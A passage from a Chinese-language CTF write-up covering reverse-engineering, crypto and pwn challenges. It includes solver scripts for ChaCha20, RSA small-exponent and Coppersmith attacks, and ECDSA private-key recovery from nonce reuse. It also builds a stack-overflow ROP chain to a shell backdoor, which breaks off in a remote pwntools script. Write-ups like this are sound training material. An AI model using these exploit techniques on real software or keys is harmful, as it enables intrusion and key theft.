(https://pylingual.io) # Internal filename: 'temp_challenge.py' # Bytecode version: 3.12.0rc2 (3531) # Source timestamp: 2026-04-05 13:07:22 UTC (1775394442) import base64 def decrypt_flag(encoded_data, key): decoded = base64.b64decode(encoded_data) return ''.join((chr(b ^ key) for b in decoded)) def main(): encoded_flag = 'CAIPCRVeABgUC1wCX0NXHh1YQx4cBFZDBV1bC0MCWw9fHF5WXV8MBx4T' xor_key = 110 user_input = input('请输入flag: ').strip() correct_flag = decrypt_flag(encoded_flag, xor_key) if user_input == correct_flag: print('正确!') else: print('错误!') if __name__ == '__main__': main() </code></pre> <p>加解密对称(异或),直接拿密文跑一遍即可:</p> <p><strong>解题脚本</strong></p> <pre><code>import base64 encoded_flag = 'CAIPCRVeABgUC1wCX0NXHh1YQx4cBFZDBV1bC0MCWw9fHF5WXV8MBx4T' xor_key = 110 decoded = base64.b64decode(encoded_flag) flag = ''.join(chr(b ^ xor_key) for b in decoded) print(flag) </code></pre> <p><img src="./images/img-20.png" alt="Figure 20" /></p> <p>flag{0nvze2l1-9ps6-prj8-k35e-l5a1r0831bip}</p> <h2>ChaCha20</h2> <h3>题目截图</h3> <p><img src="./images/img-21.png" alt="Figure 21" /></p> <h3>解题思路</h3> <p>jadx打开后,直接跳转到mainactivity</p> <p>验证按钮回调走这里</p> <p><img src="./images/img-22.png" alt="Figure 22" /></p> <p><code>NativeBridge</code> 注册了一堆 native 方法,但 <code>MainActivity</code> 只调了 <code>c\(String\)</code>,其它 <code>ab/cd/dc</code> 都是噪音。</p> <p><img src="./images/img-23.png" alt="Figure 23" /></p> <p><code>libmyapplication\.so</code> 没导出 <code>Java\_…\_c</code> 这种符号,是用 <code>RegisterNatives</code> 动态注册的。<code>\.data\.rel\.ro</code> 起头三个 12 字节的 <code>JNINativeMethod</code> 结构体:</p> <p><img src="./images/img-24.png" alt="Figure 24" /></p> <p><img src="./images/img-25.png" alt="Figure 25" /></p> <p>解出三项:</p> <table> <thead> <tr> <th>name</th> <th>signature</th> <th>fnPtr</th> </tr> </thead> <tbody> <tr> <td><code>a</code></td> <td><code>\(\[B\)\[B</code></td> <td><code>0x250b0</code></td> </tr> <tr> <td><code>b</code></td> <td><code>\(\[B\)\[B</code></td> <td><code>0x251f0</code></td> </tr> <tr> <td><code>c</code></td> <td><code>\(Ljava/lang/String;\)Z</code></td> <td><code>0x25330</code></td> </tr> </tbody> </table> <p>0x25330是目标函数</p> <p><code>c\(\)</code> 做 4 件事:</p> <ol> <li> <p><code>GetStringUTFChars</code> 取出用户输入;</p> </li> <li> <p>把输入字节当明文喂给「加密+hex」函数 <code>sub\_25740</code>,得到 <code>out\_hex</code>(小写十六进制字符串);</p> </li> <li> <p>把 <code>out\_hex</code> 一字节一字节和全局 <code>g\_target</code>(<code>std::vector\&amp;lt;uint8\_t\&amp;gt;</code>,地址 <code>0x5a16c</code>)比较;</p> </li> <li> <p>完全相等返回 <code>JNI\_TRUE</code>,否则 <code>JNI\_FALSE</code>。</p> </li> </ol> <p><img src="./images/img-26.png" alt="Figure 26" /></p> <p>sub_276f0<code>看反汇编是个</code>mov $0x8, %eax; ret<code>的「常量 8」,但它其实是一个 stub —— 真实的</code>g_target.size()<code>是把</code>vector<code>的</code>_end - _begin<code>拿出来再除以 1。比较循环每轮按</code>0x40<code>\-byte 块前进(外层 </code>25803: cmp $0x40, %eax`),所以一轮匹配 64 字节(密文是 50 字符,刚好够用一轮)</p> <p><code>c\(\)</code> 的语义就是:<code>hex\(ChaCha20\(input\)\) == \&amp;\#34;d097c3f6d279df23af24ad35e9e08793831c8e2a22a1b2968b\&amp;\#34;</code>。</p> <p>加密+hex 包装函数 `sub_25740`</p> <p><img src="./images/img-27.png" alt="Figure 27" /></p> <p>key和nonce</p> <p><img src="./images/img-28.png" alt="Figure 28" /></p> <p>取 key / nonce 的字节排布</p> <p>内部一系列 <code>call 27160</code>(每次读一个 32-bit 小端 word),把 <code>\.rodata</code> 字节按 little-endian 拼成 <code>state\[4\.\.11\]</code>(key)和 <code>state\[13\.\.15\]</code>(nonce),<code>state\[12\] = counter</code>。这正好是 RFC 7539 ChaCha20 的状态布局。</p> <p><img src="./images/img-29.png" alt="Figure 29" /></p> <p>hex字母表</p> <p><img src="./images/img-30.png" alt="Figure 30" /></p> <p>sub_27530<code>把每个密文字节</code>b拆成两位:</p> <p><img src="./images/img-31.png" alt="Figure 31" /></p> <p>ChaCha20 block 函数sub_26cc0</p> <p><code>sub\_25740</code> 在每轮里调一次 <code>0x26cc0</code> 生成 64 字节 keystream。这就是标准 ChaCha20 block:</p> <p><img src="./images/img-32.png" alt="Figure 32" /></p> <p>sub_271a0就是 ChaCha20 的 quarter-round(add / xor / rotl 16/12/8/7)。10 次 double-round = 20 round。</p> <p>目标密文:来自 `.init_array` 在运行时填充的全局 vector</p> <p><img src="./images/img-33.png" alt="Figure 33" /></p> <p>sub_24be0是真正的填充逻辑:</p> <p><img src="./images/img-34.png" alt="Figure 34" /></p> <p>解题脚本</p> <pre><code>#!/usr/bin/env python3 KEY = bytes.fromhex( "149263a16f2d89cbf0375b1ca94e78d3" "226017ee9abc4d0853e1762a8dc4903f" ) NONCE = bytes.fromhex("44332211abcdef668899aa55") CIPHERTEXT = bytes.fromhex( "d097c3f6d279df23af24ad35e9e08793831c8e2a22a1b2968b" ) COUNTER = 1 # IETF ChaCha20 默认起始 counter def rotl32(v, n): return ((v &lt;&lt; n) &amp; 0xFFFFFFFF) | (v &gt;&gt; (32 - n)) def quarter_round(s, a, b, c, d): s[a] = (s[a] + s[b]) &amp; 0xFFFFFFFF; s[d] ^= s[a]; s[d] = rotl32(s[d], 16) s[c] = (s[c] + s[d]) &amp; 0xFFFFFFFF; s[b] ^= s[c]; s[b] = rotl32(s[b], 12) s[a] = (s[a] + s[b]) &amp; 0xFFFFFFFF; s[d] ^= s[a]; s[d] = rotl32(s[d], 8) s[c] = (s[c] + s[d]) &amp; 0xFFFFFFFF; s[b] ^= s[c]; s[b] = rotl32(s[b], 7) def u32le(b): return int.from_bytes(b, "little") def chacha20_keystream(key, nonce, length, counter=1): assert len(key) == 32 and len(nonce) == 12 out = bytearray() bc = counter consts = b"expand 32-byte k" while len(out) &lt; length: state = ( [u32le(consts[i:i + 4]) for i in range(0, 16, 4)] + [u32le(key[i:i + 4]) for i in range(0, 32, 4)] + [bc] + [u32le(nonce[i:i + 4]) for i in range(0, 12, 4)] ) w = state[:] for _ in range(10): # 20 rounds = 10 double-rounds quarter_round(w, 0, 4, 8, 12) quarter_round(w, 1, 5, 9, 13) quarter_round(w, 2, 6, 10, 14) quarter_round(w, 3, 7, 11, 15) quarter_round(w, 0, 5, 10, 15) quarter_round(w, 1, 6, 11, 12) quarter_round(w, 2, 7, 8, 13) quarter_round(w, 3, 4, 9, 14) for i, word in enumerate(w): out.extend(((word + state[i]) &amp; 0xFFFFFFFF).to_bytes(4, "little")) bc = (bc + 1) &amp; 0xFFFFFFFF return bytes(out[:length]) def chacha20_xor(key, nonce, data, counter=1): ks = chacha20_keystream(key, nonce, len(data), counter) return bytes(a ^ b for a, b in zip(data, ks)) def main(): print(f"[+] key : {KEY.hex()}") print(f"[+] nonce : {NONCE.hex()}") print(f"[+] cipher : {CIPHERTEXT.hex()}") print(f"[+] counter={COUNTER}") flag = chacha20_xor(KEY, NONCE, CIPHERTEXT, counter=COUNTER) try: print(f"[+] FLAG : {flag.decode()}") except UnicodeDecodeError: print(f"[!] non-utf8 plaintext: {flag!r}") if __name__ == "__main__": main() </code></pre> <p><img src="./images/img-35.png" alt="Figure 35" /></p> <p>flag{2023326077889096380}</p> <h2>DES加密验证</h2> <h3>题目截图</h3> <p><img src="./images/img-36.png" alt="Figure 36" /></p> <h3>解题思路</h3> <p>主 Activity:DEX 热加载</p> <p><code>com\.cr\.crackme2\.MainActivity\.onCreate\(\)</code> 调用了 <code>b\(\)</code>,关键步骤:</p> <p><img src="./images/img-37.png" alt="Figure 37" /></p> <p>Native 库:</p> <pre><code>public static native boolean verifyFlag(String str); static { System.loadLibrary("crackme2"); } </code></pre> <p><strong>释放出的 wide Activity</strong></p> <p><code>assets/classes3\.dex</code> 中的 <code>com\.cr\.test\.wide</code> 是真正承担 UI 校验的类:</p> <pre><code>private boolean callNativeMethod(String str) { Class&lt;?&gt; clazz = Class.forName("com.cr.crackme2.MainActivity"); Method method = clazz.getMethod("verifyFlag", String.class); return (Boolean) method.invoke(null, str); } </code></pre> <p><img src="./images/img-38.png" alt="Figure 38" /></p> <p>干扰类:<code>com\.example\.demo\.\{MathUtils, LibraryBook, ShoppingCart, User, MainActivity, MainActivity2\}</code> —— 都是与校验无关的样板类,用来扩大 jadx 输出迷惑分析人员。</p> <p>去ida里面分析so文件</p> <p>函数注册</p> <pre><code>// JNI_OnLoad → register_native_methods RegisterNatives(env, FindClass("com/cr/crackme2/MainActivity"), {"verifyFlag", "(Ljava/lang/String;)Z", &amp;verifyFlag}, 1); </code></pre> <p><strong><code>verifyFlag</code></strong>** 反编译(关键)**</p> <pre><code>char verifyFlag(JNIEnv *env, jclass cls, jstring jstr) { const char *pcVar1 = env-&gt;GetStringUTFChars(jstr, NULL); int len_in = strlen(pcVar1); size_t padded_len = 0; uchar *padded = pkcs7_pad(pcVar1, len_in, &amp;padded_len); // FUN_00034490 uchar *enc_buf = malloc(padded_len); des_ecb_encrypt(padded, padded_len, (uchar*)"12345678", enc_buf); // !!! 干扰 std::string hex; bytesToHex(&amp;hex, padded); // 真正比较的源 int got = std::string::data(&amp;hex); char ok = 0; for (int i = 0; i &lt; 1; i++) { if (std::string_eq(&amp;DAT_00068060 + i*0xc, &amp;hex)) { // 与全局 EncryptedFlag 比较 ok = 1; break; } } return ok; } </code></pre> <p>注意几个反直觉的点:</p> <ol> <li> <p><strong>DES 结果没被使用</strong> —— `enc_buf` 仅 `free` 掉,从未参与比较。</p> </li> <li> <p>`bytesToHex` 接受的是 <strong>PKCS#7 填充后的明文</strong>,不是密文。</p> </li> <li> <p>比较使用 <code>std::string::operator==</code>(<code>FUN\_00034560</code>),即逐字节相等。</p> </li> <li> <p>全局对象 <code>DAT\_00068060</code>(<code>EncryptedFlag</code> 类型)是 <code>std::string</code>,内容在构造函数里被静态初始化。</p> </li> </ol> <p>PKCS#7 填充函数`FUN_00034490`</p> <pre><code>void *pkcs7_pad(const void *src, int len, size_t *out_len) { int pad = 8 - len % 8; // 即使整除也会再补 8 字节 *out_len = len + pad; void *p = malloc(*out_len); memcpy(p, src, len); for (int i = len; i &lt; *out_len; i++) ((char*)p)[i] = (char)pad; return p; } </code></pre> <p>标准 PKCS#7,补到 8 字节倍数。</p> <p><strong>`EncryptedFlag` 全局对象的初始化</strong></p> <p>在 <code>\.init\_array</code> 调度的构造函数 <code>FUN\_00033e40</code>:</p> <pre><code>void __cxx_global_var_init() { std::string::string(&amp;DAT_00068060, "666c61677b623532376532363231313331313334656332323235316366626361" "373565386339663561653466343133373138373166643535393131393237663636613162347d0202"); __cxa_atexit(EncryptedFlag::~EncryptedFlag, ...); } </code></pre> <p>解题脚本</p> <pre><code>#!/usr/bin/env python3 # -*- coding: utf-8 -*- CMP_TARGET_HEX = ( "666c61677b623532376532363231313331313334656332323235316366626361" "373565386339663561653466343133373138373166643535393131393237663636613162347d0202" ) def pkcs7_pad(data: bytes, block: int = 8) -&gt; bytes: pad_len = block - (len(data) % block) return data + bytes([pad_len]) * pad_len def pkcs7_unpad(data: bytes) -&gt; bytes: pad_len = data[-1] if pad_len &lt; 1 or pad_len &gt; 8: raise ValueError(f"非法的 PKCS#7 填充长度: {pad_len}") if data[-pad_len:] != bytes([pad_len]) * pad_len: raise ValueError("PKCS#7 填充内容不一致") return data[:-pad_len] def recover_flag() -&gt; str: raw = bytes.fromhex(CMP_TARGET_HEX) return pkcs7_unpad(raw).decode("ascii") def verify(flag: str) -&gt; bool: padded_hex = pkcs7_pad(flag.encode("utf-8"), 8).hex() return padded_hex == CMP_TARGET_HEX if __name__ == "__main__": flag = recover_flag() print(f"[+] 还原 flag: {flag}") print(f"[+] 长度 : {len(flag)}") ok = verify(flag) print(f"[+] 模拟校验: {'PASS' if ok else 'FAIL'}") assert ok, "回填校验失败,请检查 CMP_TARGET_HEX" </code></pre> <p><img src="./images/img-39.png" alt="Figure 39" /></p> <p>flag{b527e2621131134ec22251cfbca75e8c9f5ae4f41371871fd55911927f66a1b4}</p> <h1>Crypto</h1> <h2>BabyRSA</h2> <h3>题目截图</h3> <p><img src="./images/img-40.png" alt="Figure 40" /></p> <h3>解题思路</h3> <p>题目给了两个附件</p> <p>task.py</p> <pre><code>from Crypto.Util.number import bytes_to_long, getPrime from secret import flag m = bytes_to_long(flag) e = 3 p = getPrime(512) q = getPrime(512) n = p * q c = pow(m, e, n) print(f"n = {n}") print(f"e = {e}") print(f"c = {c}") </code></pre> <p>out.text</p> <pre><code>n = 112236684276598445953470958979974248139305658317743482421936811887828282366740495598766025283574975379354653410041294383732249721913289160553784366226963636561141148428299310897822558962407745549801741467690656825961511511191360890527802201275378106451269606406534901848399667333669874060639983305991244441419 e = 3 c = 2217344750798591625447833487696320861775115646060744565481810923840358354823011100363343264521780315972663215185875986580406759972170037422918646653524839131172834345312234369524761802337273644307475982202699180835279895013740317857205387940896435849998551522519951199597669 </code></pre> <p>经典 RSA 小指数(<code>e = 3</code>)题型。先看看 <code>n</code> 和 <code>c</code> 的位数关系:</p> <table> <thead> <tr> <th>值</th> <th>比特长度</th> </tr> </thead> <tbody> <tr> <td><code>n</code></td> <td>1024</td> </tr> <tr> <td><code>c</code></td> <td>909</td> </tr> </tbody> </table> <p>也就是 <code>c \&amp;lt; n</code>。这暗示 <code>m^3</code> 在没有取模的情况下就已经小于 <code>n</code>,于是</p> <p>直接对 <code>c</code> 开三次方就能拿到 <code>m</code>,无需分解 <code>n</code>。</p> <p>解题脚本</p> <pre><code>import gmpy2 from Crypto.Util.number import long_to_bytes n = 112236684276598445953470958979974248139305658317743482421936811887828282366740495598766025283574975379354653410041294383732249721913289160553784366226963636561141148428299310897822558962407745549801741467690656825961511511191360890527802201275378106451269606406534901848399667333669874060639983305991244441419 e = 3 c = 2217344750798591625447833487696320861775115646060744565481810923840358354823011100363343264521780315972663215185875986580406759972170037422918646653524839131172834345312234369524761802337273644307475982202699180835279895013740317857205387940896435849998551522519951199597669 m, exact = gmpy2.iroot(c, e) assert exact print(long_to_bytes(int(m)).decode()) </code></pre> <p><img src="./images/img-41.png" alt="Figure 41" /></p> <p>flag{769cc0209669698952823747f21eb10e}</p> <h2>ScatterRSA</h2> <h3>题目截图</h3> <p><img src="./images/img-42.png" alt="Figure 42" /></p> <h3>解题思路</h3> <p>题目给了两个附件</p> <p>task.py</p> <pre><code>from secret import flag from Crypto.Util.number import * import random m = bytes_to_long(flag) e = 3 print(f"e = {e}") for i in range(3): p = getPrime(512) q = getPrime(512) n = p * q a = random.getrandbits(128) | (1 &lt;&lt; 127) b = random.getrandbits(256) | (1 &lt;&lt; 255) c = pow(a * m + b, e, n) print(f"n{i+1} = {n}") print(f"a{i+1} = {a}") print(f"b{i+1} = {b}") print(f"c{i+1} = {c}") </code></pre> <p>out.text</p> <pre><code>e = 3 n1 = 134590028715846226751903719587861090472772080921099504036178613989523328571021119450984313988905557385036821505121612368860436253713267192159612607745301358472400758433053304358101099945515440169672493726615122471822947908806960237079424527450364377187388434878044214423874958715687632702618242260038201552961 a1 = 173235201602700035769143714622479214858 b1 = 58616053309986169433995951615552358657183395855412447208282770965760612937595 c1 = 50192984704229516422576705848426706185707023557654942997226592852562126143797118081125527050565529571702518296053642057549607538952767595537352818598436177372629946093076195084953301667499579328461288560942915342433209991739202980657987347584757491195480319156057361829134996133204059551472598891366688783755 n2 = 68196420818362667184273231820367250019665598198220107894027697404250798750179650739212752171893537136631632644245299647403521159317636479179387396036378651369427323164026037204640004005081098772718308292781228113356944341374614054386589378286349095152732830327900238600877850386212764491160551279660914970501 a2 = 235763128007574771186749199470667788696 b2 = 82833393375329622580640447653813478693484654663680708964473557677310067110872 c2 = 58727033167047203506164797837999819283982869287436076252773072774355826490167620639330797956244757203726547611149611642979362714607329797512143580714003751905301065313982278186988038708909021000691905664629331025167676669052317049958574849948837597306860613961557323523558290710860835719858942854534226001532 n3 = 104197894722251549417361866562671346718448272653499933412399440512957241054274214931999347021968663121866250705242698152904168891226692027345376090411001289684534871464563352348782346283820734447304134789063563965860082130364230372312070163983650187312362722689902212270815366758596540699197732479604574605717 a3 = 289837185860108823269362666161877095653 b3 = 88038264202304767250178171651729306984925900158278305985019519489525502096874 c3 = 12441437714234741776087648075441633972630237216692770981303759863634569477393643678959437151894987980323367988780311101132662707086178418962311399292280866817688865303206505050428252909551141504556842671029262184318022978671849627397763537173137629868777942717009356259616195047064075877128354789683093509959 </code></pre> <p>对脚本进行分析</p> <p>同一明文 <code>m</code>,用 <code>e=3</code> 在三个不同模数 <code>n\_i</code> 下被加密;</p> <p>每次先做仿射变换 `a_i*m + b_i` 再立方 —— 即所谓<strong>线性 padding</strong>;</p> <p><code>a\_i \(\~128 bit\)</code>、<code>b\_i \(\~256 bit\)</code> 都已公开(只是混淆,不是真正的随机化)。</p> <ol> <li><strong>构造同根多项式</strong></li> </ol> <p>每个密文给出一个以 <code>m</code> 为根的多项式:</p> <p>$f_i(x) = (a_i x + b_i)^3 - c_i \equiv 0 \pmod{n_i}$</p> <ol> <li><strong>化为首一</strong></li> </ol> <p>在 <code>Z/n\_i Z</code> 上把 <code>f\_i</code> 除以 <code>a\_i^3</code>,得到首一三次多项式:</p> <p>$\hat f_i(x) = x^3 + 3 b_i a_i^{-1} x^2 + 3 b_i^2 a_i^{-2} x + (b_i^3 - c_i) a_i^{-3} \pmod{n_i}$</p> <ol> <li><strong>CRT 合并</strong></li> </ol> <p>对系数逐位 CRT 到模 <code>N = n1 n2 n3</code>,得到首一多项式 <code>F\(x\)</code>,仍以 <code>m</code> 为根(mod <code>N</code>)。</p> <ol> <li><strong>Coppersmith small root</strong></li> </ol> <p><code>m</code> 大小 ~256 bit,<code>N</code> 大小 ~3072 bit,<code>X = 2^300</code> 已是宽松界。用 Howgrave-Graham 格 <code>dim = 4</code> 足够:</p> <pre><code>行 0..2: N * x^i (i = 0, 1, 2) 行 3 : F(x) 列 j 上整体乘 X^j </code></pre> <p>LLL 后取最短行,按列除回 <code>X^j</code> 得到整系数多项式 <code>g\(x\)</code>;它在整数上以 <code>m</code> 为根。</p> <ol> <li><strong>求整数根</strong></li> </ol> <p><code>g\(x\)</code> 度数 3,用 <code>sympy</code> 求实根(其中一个是大整数),即得 <code>m</code>,再 <code>long\_to\_bytes</code> 即可。</p> <p><strong>解题脚本</strong></p> <pre><code> from Crypto.Util.number import long_to_bytes from fractions import Fraction try: from gmpy2 import mpq as Q, mpz as Z except ImportError: # pragma: no cover Q = Fraction Z = int import sympy # --------------------------- exact-rational LLL ----------------------------- def lll(B, delta=Q(3, 4)): n = len(B) B = [[Z(x) for x in row] for row in B] def qdot(u, v): s = Q(0) for a, b in zip(u, v): s += a * b return s Bs = [None] * n mu = [[Q(0)] * n for _ in range(n)] def gso(): for i in range(n): Bs[i] = [Q(x) for x in B[i]] for j in range(i): mu[i][j] = qdot([Q(x) for x in B[i]], Bs[j]) / qdot(Bs[j], Bs[j]) Bs[i] = [a - mu[i][j] * b for a, b in zip(Bs[i], Bs[j])] gso() k = 1 while k &lt; n: changed = False for j in range(k - 1, -1, -1): if abs(mu[k][j]) &gt; Q(1, 2): m_kj = mu[k][j] q = int(m_kj + Q(1, 2)) if m_kj &gt;= 0 else -int(-m_kj + Q(1, 2)) if q != 0: B[k] = [a - q * b for a, b in zip(B[k], B[j])] changed = True if changed: gso() if qdot(Bs[k], Bs[k]) &gt;= (delta - mu[k][k - 1] ** 2) * qdot(Bs[k - 1], Bs[k - 1]): k += 1 else: B[k], B[k - 1] = B[k - 1], B[k] gso() k = max(k - 1, 1) return [[int(x) for x in row] for row in B] # ------------------------------ challenge data ------------------------------ e = 3 n1 = 134590028715846226751903719587861090472772080921099504036178613989523328571021119450984313988905557385036821505121612368860436253713267192159612607745301358472400758433053304358101099945515440169672493726615122471822947908806960237079424527450364377187388434878044214423874958715687632702618242260038201552961 a1 = 173235201602700035769143714622479214858 b1 = 58616053309986169433995951615552358657183395855412447208282770965760612937595 c1 = 50192984704229516422576705848426706185707023557654942997226592852562126143797118081125527050565529571702518296053642057549607538952767595537352818598436177372629946093076195084953301667499579328461288560942915342433209991739202980657987347584757491195480319156057361829134996133204059551472598891366688783755 n2 = 68196420818362667184273231820367250019665598198220107894027697404250798750179650739212752171893537136631632644245299647403521159317636479179387396036378651369427323164026037204640004005081098772718308292781228113356944341374614054386589378286349095152732830327900238600877850386212764491160551279660914970501 a2 = 235763128007574771186749199470667788696 b2 = 82833393375329622580640447653813478693484654663680708964473557677310067110872 c2 = 58727033167047203506164797837999819283982869287436076252773072774355826490167620639330797956244757203726547611149611642979362714607329797512143580714003751905301065313982278186988038708909021000691905664629331025167676669052317049958574849948837597306860613961557323523558290710860835719858942854534226001532 n3 = 104197894722251549417361866562671346718448272653499933412399440512957241054274214931999347021968663121866250705242698152904168891226692027345376090411001289684534871464563352348782346283820734447304134789063563965860082130364230372312070163983650187312362722689902212270815366758596540699197732479604574605717 a3 = 289837185860108823269362666161877095653 b3 = 88038264202304767250178171651729306984925900158278305985019519489525502096874 c3 = 12441437714234741776087648075441633972630237216692770981303759863634569477393643678959437151894987980323367988780311101132662707086178418962311399292280866817688865303206505050428252909551141504556842671029262184318022978671849627397763537173137629868777942717009356259616195047064075877128354789683093509959 ns = [n1, n2, n3] as_ = [a1, a2, a3] bs = [b1, b2, b3] cs = [c1, c2, c3] # ---- 1. f_i(x) = (a_i x + b_i)^3 - c_i, normalised to monic mod n_i -------- monic = [] for n, a, b, c in zip(ns, as_, bs, cs): ia = pow(a, -1, n) f0 = ((b ** 3 - c) * pow(ia, 3, n)) % n f1 = (3 * b * b % n * pow(ia, 2, n)) % n f2 = (3 * b * ia) % n monic.append([f0, f1, f2, 1]) # ---- 2. CRT coefficients to N = n1 n2 n3 ----------------------------------- N = n1 * n2 * n3 def crt(vals, mods, M): r = 0 for v, m_ in zip(vals, mods): Mi = M // m_ r = (r + v * Mi * pow(Mi, -1, m_)) % M return r F = [crt([p[k] for p in monic], ns, N) for k in range(4)] assert F[3] == 1 print("F(x) computed (deg 3 monic mod N).") # ---- 3. Howgrave-Graham lattice (d = 3, t = 1, dim = 4) -------------------- d, t = 3, 1 dim = d + t X = 1 &lt;&lt; 300 # safe upper bound on m (m is ~256 bits) B = [[0] * dim for _ in range(dim)] for i in range(d): B[i][i] = N * (X ** i) for j in range(t): for k in range(d + 1): col = j + k B[d + j][col] = F[k] * (X ** col) print(f"Running LLL on {dim}x{dim}...", flush=True) red = lll(B, Q(3, 4)) print("LLL done.") # Recover the integer polynomial g(x) from the shortest vector. short = red[0] g_coeffs = [short[j] // (X ** j) for j in range(dim)] while g_coeffs and g_coeffs[-1] == 0: g_coeffs.pop() def evalp(coefs, x): r = 0 for c in reversed(coefs): r = r * x + c return r # ---- 4. Find the integer root of g(x) -------------------------------------- xs = sympy.symbols("x") poly = sympy.Poly(sum(c * xs ** i for i, c in enumerate(g_coeffs)), xs) m = None for r in poly.real_roots(): try: ri = int(r) except (TypeError, ValueError): continue for cand in (ri - 1, ri, ri + 1): if cand &gt; 0 and evalp(g_coeffs, cand) == 0: m = cand break if m is not None: break assert m is not None, "no integer root recovered" print("m =", m) print("flag =", long_to_bytes(m)) </code></pre> <p><img src="./images/img-43.png" alt="Figure 43" /></p> <p>flag{d3e053494a1280f3cff1c22c170069c0}</p> <h2>ECDSA nonce 重用</h2> <h3>题目截图</h3> <p><img src="./images/img-44.png" alt="Figure 44" /></p> <h3>解题思路</h3> <p><code>challenge\.json</code>:</p> <pre><code>{ "public_key_x": 82937147571408969267139200041203360936951744683871440166987788062427108593019, "public_key_y": 15586372809254615553254077057166913120384173467039862910897487982227597191402, "message1": "57656c636f6d6520746f2074686520435446206368616c6c656e676521", "message2": "506c65617365207265636f766572207468652073656372657420666c61672e", "signature1_r": 79013718241246135302610197377430012073343423894519665480327871129212060301075, "signature1_s": 103286208825942613961036297876825547961346350046619406322280179767228016529778, "signature2_r": 79013718241246135302610197377430012073343423894519665480327871129212060301075, "signature2_s": 79104101230423979234833091375845809917052647390793147016296814906477227009899, "curve": "SECP256k1" } </code></pre> <p>`signature1_r == signature2_r`。在 ECDSA 中 `r = (k·G).x mod n`,两条不同消息的 `r` 完全相同,意味着签名时使用了 <strong>同一个 nonce `k`</strong>。</p> <p>ECDSA 签名公式(曲线阶为 <code>n</code>,消息哈希为 <code>z</code>,私钥为 <code>d</code>):</p> <pre><code>s = k⁻¹ · (z + r·d) (mod n) </code></pre> <p>当两条消息复用同一个 <code>k</code>(因此 <code>r</code> 相同)时:</p> <pre><code>s1 = k⁻¹ · (z1 + r·d) s2 = k⁻¹ · (z2 + r·d) </code></pre> <p>两式相减消去 <code>d</code>,解出 <code>k</code>:</p> <pre><code>s1 − s2 = k⁻¹ · (z1 − z2) k = (z1 − z2) · (s1 − s2)⁻¹ (mod n) </code></pre> <p>再代回任一式即可解出私钥 <code>d</code>:</p> <pre><code>d = (s1·k − z1) · r⁻¹ (mod n) </code></pre> <p>其中 <code>z = SHA256\(message\) mod n</code>(secp256k1 标准做法,消息为题目给出的 hex 串解码后再哈希)。</p> <p>恢复出的私钥(64 位 hex),Flag 末段取私钥 hex 的<strong>前 32 位</strong></p> <p>exp如下:</p> <pre><code>import json, hashlib d = json.load(open('challenge.json')) # secp256k1 群阶 n n = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141 r = d['signature1_r'] s1 = d['signature1_s'] s2 = d['signature2_s'] def H(hexmsg): return int.from_bytes(hashlib.sha256(bytes.fromhex(hexmsg)).digest(), 'big') % n z1 = H(d['message1']) z2 = H(d['message2']) # 恢复 nonce k 与私钥 priv k = (z1 - z2) * pow(s1 - s2, -1, n) % n priv = (s1 * k - z1) * pow(r, -1, n) % n # 私钥转为 64 位 hex,不足补 0 priv_hex = f"{priv:064x}" # 取前 32 个 hex 字符作为 flag 末段 flag = f"flag{{ecdsa_nonce_reuse_{priv_hex[:32]}}}" print(flag) </code></pre> <p>恢复出的私钥(64 位 hex):</p> <pre><code>a46b8f59aac5f0d5f1e661827c1cf3a7f536c9ce5a5d2452942215f16480d48b </code></pre> <p>Flag 末段取私钥 hex 的<strong>前 32 位</strong>:</p> <pre><code>flag{ecdsa_nonce_reuse_a46b8f59aac5f0d5f1e661827c1cf3a7} </code></pre> <p><img src="./images/img-45.png" alt="Figure 45" /></p> <h1>Pwn</h1> <h2>PWN-Authenticate</h2> <h3>题目截图</h3> <p><img src="./images/img-46.png" alt="Figure 46" /></p> <h3>解题思路</h3> <p>对附件 <code>vuln</code> 进行检查:</p> <pre><code>checksec --file=./vuln </code></pre> <p>结果要点如下:</p> <ul> <li> <p><code>No PIE</code>:程序基址固定,函数地址可直接使用</p> </li> <li> <p><code>No canary found</code>:栈上没有 canary,适合直接做栈溢出</p> </li> <li> <p>程序未去符号:函数名可直接看到</p> </li> </ul> <p>同时在程序字符串中能直接看到几个关键信息:</p> <ul> <li> <p>存在危险函数 <code>gets</code></p> </li> <li> <p>存在 <code>system</code></p> </li> <li> <p>存在 <code>/bin/sh</code></p> </li> <li> <p>存在后门函数 <code>backdoor</code></p> </li> </ul> <p>说明这题的预期思路非常明确:利用 <code>gets\(\)</code> 覆盖返回地址,跳转到程序自带后门。</p> <p><img src="./images/img-47.png" alt="Figure 47" /></p> <p>反汇编后可以看到 <code>login\(\)</code> 和 <code>backdoor\(\)</code> 两个关键函数。</p> <p>1.backdoor()</p> <pre><code>void backdoor() { system("/bin/sh"); } </code></pre> <p>后门函数的作用非常直接,就是弹 shell。</p> <p>2.login()</p> <p>核心逻辑大致如下:</p> <pre><code>void login() { char username[0x40]; char password[0x80]; puts("=== Welcome to SecureAuth System ==="); printf("Username: "); read(0, username, 0x40); printf("Password: "); gets(password); if (!strcmp(username, "admin")) { puts("Access Denied: Admin login is disabled."); } else { puts("Invalid credentials."); } } </code></pre> <p><img src="./images/img-48.png" alt="Figure 48" /></p> <p>这里的漏洞点在:</p> <pre><code>gets(password); </code></pre> <p><code>gets\(\)</code> 不会检查输入长度,因此可以溢出覆盖保存的 <code>rbp</code> 和返回地址。</p> <p>根据反汇编可知:</p> <ul> <li> <p><code>password</code> 位于 <code>rbp\-0x80</code></p> </li> <li> <p>函数返回地址位于 <code>\[rbp\+8\]</code></p> </li> </ul> <p>因此从 <code>password</code> 起始位置到返回地址的偏移为:</p> <pre><code>0x80 + 0x8 = 0x88 = 136 </code></pre> <p>所以 payload 的前 136 字节用于填充,后面覆盖返回地址。</p> <p>一开始如果直接把返回地址覆盖为 <code>backdoor\(\)</code>,程序虽然会跳进去,但在执行 <code>system\(\&amp;\#34;/bin/sh\&amp;\#34;\)</code> 时会因为栈未按 16 字节对齐而崩溃。</p> <p>这是因为在 x64 下调用某些 libc 函数时,对栈对齐有要求。</p> <p>因此需要先插入一个单独的 <code>ret</code> gadget,把栈调整到正确对齐后,再跳转到 <code>backdoor\(\)</code>。</p> <p>本题中可用地址为:</p> <ul> <li> <p><code>ret</code>:<code>0x40101a</code></p> </li> <li> <p><code>backdoor</code>:<code>0x4011f6</code></p> </li> </ul> <p>最终 ROP 链为:</p> <pre><code>'A' * 136 + p64(0x40101a) + p64(0x4011f6) </code></pre> <p>脚本如下:</p> <pre><code>from pwn import * context.log_level = "info" HOST = "120.27.146.76" PORT = 28517 p = remote(HOST, PORT) 